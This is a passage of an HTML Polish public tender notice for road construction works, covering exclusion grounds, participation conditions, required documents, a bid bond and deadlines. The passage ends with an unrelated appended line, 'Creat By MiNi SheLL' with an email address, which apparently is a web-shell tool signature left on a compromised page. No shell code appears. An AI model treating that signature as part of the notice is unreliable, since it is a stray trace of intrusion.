podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp Zamawiający określa następujące warunki udziału w postępowaniu dotyczące: <br/><br/>1) zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.<br/><br/>3)	sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.<br/><br/>4)	zdolności technicznej lub zawodowej;<br/>W celu potwierdzenia spełnienia tego warunku Wykonawca wykaże, że:<br/> a) posiada doświadczenie w wykonaniu robót budowlanych polegających na budowie, przebudowie, rozbudowie i remoncie dróg o łącznej wartości robót nie mniejszej niż 4 000 000,00 zł. brutto, a roboty te wykonane były w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie; (Zał. Nr 6 do SWZ)<br/><br/>Okres wyrażony w latach, o którym mowa powyżej, liczy się wstecz od dnia:<br/>- w którym upływa termin składania ofert; <br/>- złożenia podmiotowego środka dowodowego, w przypadkach, o których mowa w art. 455 ust. 1 pkt 2 lit. b oraz art. 462 ust. 7 Pzp.<br/>Jako wykonanie (zakończenie) zadania należy rozumieć podpisanie Protokołu odbioru robót lub równoważnego dokumentu. Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazana rzez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień podpisania umowy.<br/>b) dysponuje lub będzie dysponował:<br/>Kierownikiem budowy tj. osobą posiadającą zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2023, poz. 682 z późn. zm.) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa; (Zał. Nr 7 do SWZ)<br/><br/>Uprawnienia, o którym mowa powyżej powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. 2023 poz. 682 z późn. zm.). Dopuszcza się ważne, odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/><br/>2) Zaświadczenie albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, dat i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty; <br/>	<br/>2) Wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Formularz oferty<br/>2)	KOSZTORYSY OFERTOWE NA ZAMÓWIENIE PODSTAWOWE I KOSZTORYS OFERTOWY NA ZAMÓWIENIE OBJĘTE PRAWEM OPCJI.<br/>3)	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy (jeśli dotyczy tj. jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru).<br/>4)	Pisemne zobowiązania innych podmiotów od oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (jeśli dotyczy). <br/>5)	Dowód wpłaty wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości: 60 000,00 zł. (słownie: sześćdziesiąt tysięcy złotych) do dnia 31.07.2024 r. do godz. 10.00. <br/>Wadium wnoszone może być w:<br/>1)	pieniądzu - przelewem na rachunek bankowy Bank Polska Kasa Opieki S.A I Oddział Łańcut<br/>96124026431111000037781763 <br/>2)	gwarancjach bankowych<br/>3)	gwarancjach ubezpieczeniowych<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>2. Wadium wnoszone w pieniądzu należy wpłacić z takim wyprzedzeniem, aby środki pieniężne zostały zaksięgowane na koncie wymienionym w Rozdz. IX ust. 1 SWZ do terminu składania ofert. <br/>3. Wadium wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> OFERTY WSPÓLNE<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku wspólnego ubiegania się o udzielenie zamówienia, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, o którym mowa w Rozdz. VII ust. 1 SWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. Do oferty należy załączyć oryginał pełnomocnictwa lub kopię poświadczoną za zgodność z oryginałem przez notariusza. Pełnomocnictwo winno:<br/>a)	określać do jakiego postępowania ma zastosowanie<br/>b)	wskazywać pełnomocnika oraz zakres jego umocowania<br/>c)	zawierać nazwę z określeniem adresu i siedziby wszystkich Wykonawców ubiegających się wspólnie o udzielenie niniejszego zamówienia.<br/>5. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>6. Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji działalności gospodarczej. <br/>7. Pełnomocnik pozostaje w kontakcie z Zamawiającym, w toku postępowania zwraca się do Zamawiającego z wszelkimi sprawami i do niego Zamawiający kieruje wszelkie informacje i korespondencję.<br/>8. Wspólnicy spółki cywilnej/uczestnicy konsorcjum są traktowani jak Wykonawcy składający ofertę wspólną.<br/>9. Przed podpisaniem umowy (w przypadku wyboru oferty wspólnej jako najkorzystniejszej) Wykonawcy składający ofertę wspólną mają obowiązek przedstawić Zamawiającemu umowę konsorcjum/umowę spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian został określony w projekcie umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-31 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Cena <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający zastrzega sobie możliwość unieważnienia postępowania w przypadku braku zgody na korektę zakresu inwestycji objętego dofinansowaniem z Rządowego Funduszu Polski Ład – Program Inwestycji Strategicznych

Creat By MiNi SheLL
Email: jattceo@gmail.com